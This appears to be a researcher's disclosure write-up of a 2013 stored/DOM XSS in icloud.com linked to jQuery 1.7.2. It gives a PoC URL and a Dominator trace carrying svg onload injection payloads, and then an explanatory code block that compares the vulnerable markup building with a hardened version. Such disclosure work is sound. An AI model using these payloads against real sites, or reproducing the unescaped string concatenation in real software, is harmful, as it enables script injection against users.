Stored DOM XSS, icloud.com, Javascript Injection, jQuery 1.7.2, User Agent Exploitation, May 2013

TL;DR In May 2013 XSS.Cx reported Stored XSS in www.icloud.com and all related applications, caused by execution of a stored javascript: Protocol Handler. The injection vector was Notes: an Attacker crafts a malicious Note containing the Code and Shares it with the Victim, whose Browser then executes the payload when the Note is Viewed. Because the payload was Stored rather than reflected, the exploit worked in all Browsers.

Stored XSS in icloud.com – Safari Browser Version Verification

Stored XSS is a Critical Vulnerability: it neuters the Same Origin Policy (SOP) that all Modern Browsers rely on (in an attempt) to draw Security Boundaries, because the injected Script runs with the full privileges of the vulnerable origin.

GTFO | PoC | Stored XSS

We failed to put together a Retail Proof of Concept and instead relied upon the Reader of our Bug Report to understand the execution context. Bug Reports to Apple are FREE, after all, and it was painfully obvious to us that the Bug executed in all Major User Agent Versions. The “Screen Grab” we sent was taken in Dominator and showed the exact line of Code that was executing the Stored Javascript Handler.

While we should never have submitted a Bug Report with only Dominator as the User Agent, the issue was Stored XSS with a Javascript Handler that would fire on ‘on*’ events, like onfocus in Chrome. The User Agent wasn’t the issue; it was our Presentation and our failure to present a wide distribution of Risk across Major User Agents.

Apple failed to understand our PoC or to follow up with a meaningful dialogue (which hadn’t happened before); then we saw news reports and it got fixed in a hurry. We wrote about CVE-2013-1034, which clearly documented the issue. Mixing Javascript Frameworks is TOXIC; in this instance, jQuery and Sprockets. Not surprisingly, the same vulnerable Code was included with OSX Server, and we wrote about CVE-2014-4406.

jQuery 1.7.1, DOM, XSS, Javascript Injection, icloud.com
jQuery 1.7.2 is vulnerable to DOM XSS

Stored DOM XSS in icloud.com Movie

PoC

https://www.icloud.com/?%22%20%3E%3C/iframe%3E%3Csvg%20onload=%22confirm%28$.expando%29%22%3E#

Debug Messages

APPLICATION NAME
keynote

TITLE
Keynote could not be loaded

MESSAGE
There was a problem loading the application due to a possible network error or missing resources. Please try again.

ORIGIN
server

TYPE
error

APP STATECHART
SC.Statechart:sc952
  initialized: true
  name: cloudos-statechart
  current-states: [
    active.springboard.displayingSpringboard.springboard
  ]
  state-transition:
    active: false
    suspended: false
  handling-event: false

CONCATLEFT
<iframe src="https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload="alert(1)">x=<svg onload="alert(1)">" title="Reminders" name="reminders" tabindex="-1" frameBorder="0" id="sc2187" class="atv3 sc-view app-frame sc-static-layout" style="" >
JOIN
<iframe src="https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload="alert(1)">x=<svg onload="alert(1)">" title="Reminders" name="reminders" tabindex="-1" frameBorder="0" id="sc2187" class="atv3 sc-view app-frame sc-static-layout" style="" ></iframe>
REPLACE
/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi, <$1></$2>
<iframe src="https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload="alert(1)">x=<svg onload="alert(1)">" title="Reminders" name="reminders" tabindex="-1" frameBorder="0" id="sc2187" class="atv3 sc-view app-frame sc-static-layout" style="" ></iframe>
CONCATRIGHT
<iframe src="https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload="alert(1)">x=<svg onload="alert(1)">" title="Reminders" name="reminders" tabindex="-1" frameBorder="0" id="sc2187" class="atv3 sc-view app-frame sc-static-layout" style="" ></iframe>
CONCATLEFT
<iframe src="https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload="alert(1)">x=<svg onload="alert(1)">" title="Reminders" name="reminders" tabindex="-1" frameBorder="0" id="sc2187" class="atv3 sc-view app-frame sc-static-layout" style="" ></iframe>
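As an added example (not code from the XSS.Cx post, from jQuery, or from Apple's iCloud client), the block below reproduces the string-building steps in the Dominator trace above and the attribute breakout that the PoC URL relies on, then contrasts them with a hardened builder. The rxhtmlTag regex is jQuery 1.7.2's own; the builder and checker function names, the attribute-tokenizer model, and the decoded payload constants are assumptions made for illustration.

```javascript
// Added example, not code from the XSS.Cx post, jQuery, or Apple's iCloud client.
// It replays the CONCATLEFT / JOIN / REPLACE steps from the Dominator trace and
// contrasts them with a hardened builder. rxhtmlTag is jQuery 1.7.2's own regex;
// every other name here is an illustrative assumption.

// REPLACE step: jQuery 1.7.2 expands self-closing tags (<div/> -> <div></div>)
// before the string reaches innerHTML. It expands attacker-supplied tags just
// as happily as the application's own.
const rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi;
function jqueryHtmlPrefilter(html) {
  return html.replace(rxhtmlTag, "<$1></$2>");
}

const REMINDERS_URL =
  "https://www.icloud.com/applications/reminders/current/en-us/index.html";

// CONCATLEFT / JOIN steps: the query string (attacker controlled, whether it
// came from location or from a stored Note) is concatenated straight into markup.
function buildFrameVulnerable(base, query) {
  const left = '<iframe src="' + base + "?" + query +
    '" title="Reminders" name="reminders" tabindex="-1" frameBorder="0">';
  return jqueryHtmlPrefilter(left + "</iframe>");
}

// Hardened form: the untrusted query is percent-encoded, so it can no longer
// carry a quote or angle bracket, and the whole URL is then escaped as
// attribute text so that no character can close the src attribute early.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;").replace(/"/g, "&quot;")
    .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}
function buildFrameHardened(base, query) {
  const src = base + "?" + encodeURIComponent(query);
  return '<iframe src="' + escapeAttr(src) +
    '" title="Reminders" name="reminders" tabindex="-1" frameBorder="0"></iframe>';
}

// Minimal model of the HTML tokenizer's double-quoted attribute state: the
// src value ends at the next '"', whatever the author of the string intended.
function srcAttributeValue(markup) {
  const start = markup.indexOf('src="') + 'src="'.length;
  return markup.slice(start, markup.indexOf('"', start));
}

// True when an <svg ... onXXX=> handler lands outside the src value, i.e. the
// payload has broken out of the attribute and will be parsed as an element
// whose onload fires as soon as it is inserted.
function handlerEscapesAttribute(markup) {
  const outside = markup.replace(srcAttributeValue(markup), "");
  return /<svg[^>]*\son\w+=/i.test(outside);
}

// Constructed inputs: the payload shown in the Dominator trace above, and the
// PoC URL's query string with its percent-encoding decoded.
const TRACE_PAYLOAD = '<svg onload="alert(1)">x=<svg onload="alert(1)">';
const POC_PAYLOAD = '" ></iframe><svg onload="confirm($.expando)">';

// Runs both payloads through both builders and reports which ones escape.
function demo() {
  return [TRACE_PAYLOAD, POC_PAYLOAD].map((p) => ({
    vulnerable: handlerEscapesAttribute(buildFrameVulnerable(REMINDERS_URL, p)),
    hardened: handlerEscapesAttribute(buildFrameHardened(REMINDERS_URL, p)),
  }));
}
```

In a live page the safer fix is not better string escaping but no string at all: create the element with document.createElement("iframe") and assign frame.src = url, so the untrusted value is stored as a property and never passes through the HTML tokenizer.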